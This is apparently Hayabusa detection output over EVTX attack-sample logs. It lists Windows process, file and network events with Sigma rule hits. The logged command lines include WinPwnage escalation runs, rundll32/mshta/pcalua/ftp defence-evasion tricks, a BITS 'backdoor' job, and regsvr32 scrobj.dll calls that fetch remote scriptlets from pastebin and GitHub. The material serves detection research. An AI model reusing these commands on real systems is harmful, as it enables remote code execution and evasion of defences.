365ABB72-69A3-5CD7-0000-00109D7F2200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:40.342 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 21:52:43.702 +09:00,IEWIN7,7045,info,,New Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx +2019-05-12 22:30:32.931 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.181 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.556 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 
365ABB72-2006-5CD8-0000-0010E0912300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 
| PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:37:49.604 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 
365ABB72-21B8-5CD8-0000-0010E4E82600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:01.383 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:55:56.626 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 
365ABB72-25EC-5CD8-0000-0010CB0A1000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.329 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:46.573 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:46.605 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 
365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:57:39.662 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:58:39.850 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 23:18:03.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: 
C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-13 02:01:43.391 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:50.781 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:20:01.980 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 
365ABB72-55C1-5CD8-0000-0010970D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:31.183 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,rules/sigma/process_creation/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.458 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 03:04:50.121 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: 
C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.780 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 
365ABB72-6759-5CD8-0000-0010E2D50F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:48:52.219 +09:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 03:48:52.766 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 23:50:59.389 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-14 03:02:49.160 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 
365ABB72-B147-5CD9-0000-00109D4F0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.895 +09:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 
